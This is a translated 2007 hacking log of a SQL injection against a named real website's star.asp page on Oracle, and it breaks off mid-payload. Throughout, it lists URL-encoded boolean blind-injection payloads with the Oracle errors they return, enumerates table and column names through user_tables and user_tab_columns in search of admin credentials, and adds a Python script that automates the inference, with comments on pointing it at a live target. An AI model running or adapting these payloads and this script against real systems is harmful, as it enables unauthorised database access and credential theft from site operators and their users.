
Notes from an Injection against ASP + ORACLE

[ Source: http://www.91now.com/down/ | Author: | Time: 2007-5-18 17:44:38 | Views: ]


http://et.kpworld.com/star.asp?performer=马三立;
------------------------------------------------------
OraOLEDB error '80040e14' ORA-00911:
invalid character
/star.asp, line 83

So the semicolon is unusable: it reached Oracle, which rejects it with ORA-00911 (a statement sent through OraOLEDB may not contain one), so stacking a second statement is not an option here.


http://et.kpworld.com/star.asp?performer=马三立'
----------------------------------------------------
OraOLEDB error '80004005' ORA-01756:
quoted string not properly terminated
/star.asp, line 83


So the single quote is not filtered: it lands inside the SQL string literal and breaks it.


http://et.kpworld.com/star.asp?performer=马三立' and '1'='1
----------------------------------------------------------------
Closing the single quote: the page returns normally. (The application's own trailing quote completes the final '1', which is why the payload ends with an unclosed '1.)


and 0<>(select count(*) from admin) and  '1'='1
-----------------------------------------------------------------
OraOLEDB error '80040e37' ORA-00942:
table or view does not exist
/star.asp, line 83


So there is no table named ADMIN in this schema (ORA-00942 is also what Oracle returns when the table exists but the connecting user has no privilege on it, so "not visible" is the safer reading).
******************************************************************


Next we need Oracle's data-dictionary views:


To get the number of rows in a table:


select num_rows from user_tables where table_name='TABLE_NAME' ---------------------- user_tables lists every table owned by the current user
(num_rows comes from optimizer statistics, so it is empty or stale until the table has been analyzed; count(*) is the reliable check)

To list the columns of a table:

select column_name from user_tab_columns where table_name='TABLE_NAME' ----------------------- user_tab_columns lists every column of those tables


and 0<>(select count(*) from all_tables) and  '1'='1
---------------------------------------------------------------------
Exists!
all_tables is a data-dictionary view that lists every table accessible to the current user, both its own and other users' tables it has privileges on.


and 0<>(select count(*) from user_tables) and  '1'='1
---------------------------------------------------------------------


Returns normally. This view exists too; it lists the tables owned by the current user.


and 0<>(select top 1 table_name from user_tables) and  '1'='1
---------------------------------------------------------------------------------
OraOLEDB error '80040e14' ORA-00923:
FROM keyword not found where expected
/star.asp, line 83


TOP 1 is not supported? ...... that explanation does not look quite right...
(PINKEYES tested it and confirmed that TOP 1 really is not supported.)
TOP is SQL Server syntax. Oracle limits rows with ROWNUM in the WHERE clause, e.g. select table_name from user_tables where rownum=1.


and 0<>(select count(*) from user_tables where table_nam<>'') and  '1'='1
--------------------------------------------------------------------------------------------


OraOLEDB error '80040e14' ORA-00904:
invalid column name /star.asp, line 83


ORA-00904 is not a generic syntax error: the column was mistyped as table_nam, so Oracle reports an identifier it does not know. (Even with the name spelled correctly this test would return nothing, because Oracle treats '' as NULL and table_name<>'' is never true.)


and 0<>(select count(*) from user_tables where table_name<>'''') and '1'='1
--------------------------------------------------------------------------------------------


Correct syntax, and the success marker comes back. Note that four single quotes are not an empty string: inside a literal two quotes stand for one, so '''' is the one-character string ', and table_name<>'''' is simply true for every table (whereas '' is NULL in Oracle and never compares equal or unequal to anything). Next, some function tests:


and 0<>(select count(*) from user_tables where sum(table_name)>1) and '1'='1
------------------------------------------------------------------------------------------------


OraOLEDB error '80040e14' ORA-00934:
group function is not allowed here
/star.asp, line 83
A group function is not allowed here: SUM and AVG are aggregates and belong in the select list or a HAVING clause, not in WHERE (and they expect numbers, not a VARCHAR2 table name).


and 0<>(select count(*) from user_tables where avg(table_name)) and '1'='1
-------------------------------------------------------------------------------------------


OraOLEDB error '80040e14' ORA-00934:
group function is not allowed here /star.asp, line 83


Same error: a group function is not allowed in WHERE.


and 0<>(select to_char(table_name) from user_tables) and%20'1'='1
--------------------------------------------------------------------------


OraOLEDB error '80004005' ORA-01427:
single-row subquery returns more than one row
/star.asp, line 83
A single-row subquery returned more than one row: 0<>(...) compares against one value, but user_tables has many rows. Add where rownum=1 to the subquery, or stay with count(*).


and 0<>(select count(*) from user_tables where table_name+1) and%20'1'='1
--------------------------------------------------------------------------


OraOLEDB error '80040e14' ORA-00920:
invalid relational operator
/star.asp, line 83
(A WHERE clause needs a condition; table_name+1 is an arithmetic expression with no comparison operator in it.)


That is enough probing; now let's see how to get its tables out:


and 0<>(select count(*) from performer) and%20'1'='1
-----------------------------------------------------


Returns normally, so the table exists. The name was guessed from the URL parameter (performer).


and 0<>(select count(*) from user_tables where table_name='performer') and%20'1'='1
-------------------------------------------------------------------------------------
Nothing back: the failure marker.


and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name='PERFORMER') and%20'1'='1
------------------------------------------------------------------------------------------------


Success! It is not that user_tables "only recognizes uppercase": Oracle folds unquoted identifiers to uppercase when objects are created and the data dictionary stores them that way, so names must be compared in uppercase (or through upper()).


and 0<>(select count(*) from user_tables where length(table_name)>10) and%20'1'='1
------------------------------------------------------------------------------------


Use LENGTH to find the length of the longest table name (>10 returns the normal page, so at least one name is longer than 10 characters).


and 0<>(select count(*) from user_tables where length(table_name)=18) and%20'1'='1
-------------------------------------------------------------------------------------


Skipping several steps, the longest table name turns out to be 18 characters.


and 0<>(select count(*) from user_tables where substr(table_name,1,1)='A') and%20'1'='1
-----------------------------------------------------------------------------------------


The first character is 'A'.


and 0<>(select count(*) from user_tables where substr(table_name,1,2)='AD') and%20'1'='1
-----------------------------------------------------------------------------------------


The first two characters are 'AD'.


and 0<>(select count(*) from user_tables where substr(table_name,1,18)='ADMINAUTHORIZATION') and%20'1'='1
---------------------------------------------------------------------------------------------
Skipping the rest: the 18-character table name is 'ADMINAUTHORIZATION'.


and 1=(select count(*) from user_tables where table_name='ADMINAUTHORIZATION') and%20'1'='1
--------------------------------------------------------------------------------------------
Returns normally: exactly one table has that name.


and 0<>(select count(*) from user_tables where length(table_name)=2) and%20'1'='1
----------------------------------------------------------------------------------


The shortest table name is 2 characters.


and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25user%25')%20and%20%20'1'='1
-------------------------------------------------------------------------------------------------


Nothing back. (%25 in the URL is an encoded %, the LIKE wildcard, so this is table_name like '%user%'; lowercase cannot match the uppercase names in the dictionary.)


and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25ADMIN%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------


and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25PER%25') and%20'1'='1
-------------------------------------------------------------------------------------------------


and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25BBS%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------


All three return the normal page, so LIKE works for guessing.


and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)>8) and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)>10)%20and%20'1'='1
-------------------------------------------------------------------------------------------------


and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like'%25BBS%25'%20and%20length(table_name)=10)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
Combining LIKE with LENGTH pins the length immediately: longer than 8, not longer than 10, so exactly 10.


and%200<>(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,4)='BBSS')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
The fourth character is S. From here on it is repetition.


and%200<>(select%20count(*)%20from%20user_tables%20where%20substr(table_name,1,10)='BBSSUBJECT')%20and%20'1'='1
-------------------------------------------------------------------------------------------------
Got it: 'BBSSUBJECT'.


and%200<>(select%20count(*)%20from%20user_tab_columns%20where%20table_name='BBSSUBJECT'%20and%20column_name%20like%20'%25USER%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------




Nothing back, so this does not look like the table that stores usernames and passwords. Try again...
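The LIKE / LENGTH / SUBSTR routine carried out by hand above, for both table names (user_tables) and column names (user_tab_columns), as an added example that is not code from the original article. It turns the manual steps into a generic routine: LIKE picks a family of names, a binary search on LENGTH pins the length, then SUBSTR recovers one character at a time, and columns are enumerated by excluding each recovered name with column_name<>'...'. So that it runs offline, the injection point is simulated over a constructed set of dictionary rows (the table and column names below are made up, apart from the ones the article recovered); for real use, replace simulated_oracle with a function that sends build_payload(...) as the performer parameter and returns True when the normal page comes back, which is the only true/false signal the article has.

```python
"""Boolean-based blind inference of Oracle data-dictionary names.

Added example, not from the original article. The sample rows, the
simulator and the ALPHABET are assumptions; the payload shape is the
article's own (0<>(select count(*) from <view> where <condition>)).
"""
import re
import string
from typing import Callable, Dict, List

# Constructed sample rows standing in for USER_TABLES / USER_TAB_COLUMNS.
# Uppercase, because Oracle stores unquoted identifiers that way (which is
# why the article's 'performer' failed and 'PERFORMER' succeeded).
SAMPLE_TABLES: Dict[str, List[str]] = {
    "ADMINAUTHORIZATION": ["ID", "ADMINNAME", "ADMINPWD"],
    "BBSSUBJECT": ["ID", "TITLE", "BODY"],
    "PERFORMER": ["ID", "NAME"],
    "AA": ["X"],
}
# Characters tried per position: unquoted Oracle identifiers use A-Z, 0-9, _, $, #.
ALPHABET = string.ascii_uppercase + string.digits + "_$#"

# An oracle answers: does count(*) from <view> where <condition> exceed zero?
Oracle = Callable[[str, str], bool]


def build_payload(condition: str, view: str = "user_tables", value: str = "马三立") -> str:
    """The exact string the article types into ?performer=. The leading quote
    closes the application's literal; the trailing '1'='1 re-balances it.
    URL-encode % as %25 and spaces as %20 before sending."""
    return f"{value}' and 0<>(select count(*) from {view} where {condition}) and '1'='1"


def _eval_predicate(pred: str, row: Dict[str, str]) -> bool:
    """Evaluate the small predicate grammar the inference routine emits."""
    pred = pred.strip()
    if m := re.fullmatch(r"length\((\w+)\)([<>=])(\d+)", pred):
        v, n = len(row[m.group(1)]), int(m.group(3))
        return {"=": v == n, ">": v > n, "<": v < n}[m.group(2)]
    if m := re.fullmatch(r"substr\((\w+),1,(\d+)\)='([^']*)'", pred):
        return row[m.group(1)][: int(m.group(2))] == m.group(3)
    if m := re.fullmatch(r"(\w+) like '([^']*)'", pred):  # % = any run, _ = one char
        rx = "".join(".*" if c == "%" else "." if c == "_" else re.escape(c) for c in m.group(2))
        return re.fullmatch(rx, row[m.group(1)]) is not None
    if m := re.fullmatch(r"(\w+)(=|<>)'((?:[^']|'')*)'", pred):
        s = m.group(3).replace("''", "'")  # '' inside a literal is one quote
        if s == "":  # Oracle treats '' as NULL: every comparison is unknown
            return False
        return (row[m.group(1)] == s) == (m.group(2) == "=")
    raise ValueError(f"simulator does not understand: {pred}")


def simulated_oracle(view: str, condition: str) -> bool:
    """Stand-in for the vulnerable page: True means 'normal page', i.e. at
    least one dictionary row satisfies every AND-ed predicate."""
    if view == "user_tables":
        rows = [{"table_name": t} for t in SAMPLE_TABLES]
    elif view == "user_tab_columns":
        rows = [{"table_name": t, "column_name": c} for t, cs in SAMPLE_TABLES.items() for c in cs]
    else:
        raise ValueError(f"unknown view {view}")  # ORA-00942 in real Oracle
    preds = condition.split(" and ")
    return any(all(_eval_predicate(p, r) for p in preds) for r in rows)


def infer_length(ask: Oracle, view: str, col: str, base: str, max_len: int = 30) -> int:
    """Binary search on length(col)>N for the longest name matching `base`."""
    lo, hi = 1, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if ask(view, f"{base} and length({col})>{mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def infer_name(ask: Oracle, view: str, col: str, base: str, length: int) -> str:
    """Recover one name with substr(col,1,k)='prefix'. Pinning length= keeps
    every guess consistent with a single row even when several match base."""
    prefix = ""
    for k in range(1, length + 1):
        for c in ALPHABET:
            if ask(view, f"{base} and length({col})={length} and substr({col},1,{k})='{prefix}{c}'"):
                prefix += c
                break
        else:
            raise RuntimeError(f"no character in ALPHABET matched after {prefix!r}")
    return prefix


def find_table(ask: Oracle, like_pattern: str, max_len: int = 30) -> str:
    """Find one table whose name matches an Oracle LIKE pattern such as '%BBS%'."""
    base = f"table_name like '{like_pattern}'"
    if not ask("user_tables", base):
        raise LookupError(f"no table matches {like_pattern}")
    n = infer_length(ask, "user_tables", "table_name", base, max_len)
    return infer_name(ask, "user_tables", "table_name", base, n)


def find_columns(ask: Oracle, table: str, max_len: int = 30) -> List[str]:
    """Enumerate every column of `table`, excluding each recovered name until none is left."""
    found: List[str] = []
    while True:
        base = f"table_name='{table}'" + "".join(f" and column_name<>'{c}'" for c in found)
        if not ask("user_tab_columns", base):
            return found
        n = infer_length(ask, "user_tab_columns", "column_name", base, max_len)
        found.append(infer_name(ask, "user_tab_columns", "column_name", base, n))


if __name__ == "__main__":
    t = find_table(simulated_oracle, "%BBS%")
    print(t, find_columns(simulated_oracle, t))
    print(build_payload("table_name like '%BBS%' and length(table_name)=10"))
```

Each character costs up to len(ALPHABET) requests with this linear scan; against a live target, a binary search on ascii(substr(...,k,1)) cuts that to about six requests per character, and the max_len ceiling must be raised if infer_name reports that nothing matched.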


and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25')%20and%20'1'='1
-------------------------------------------------------------------------------------------------


and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)>10)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)>15)%20and%20'1'='1
-------------------------------------------------------------------------------------------------
and%200<>(select%20count(*)%20from%20user_tables%20where%20table_name%20like%20'%25USER%25'%20and%20length(table_name)=15
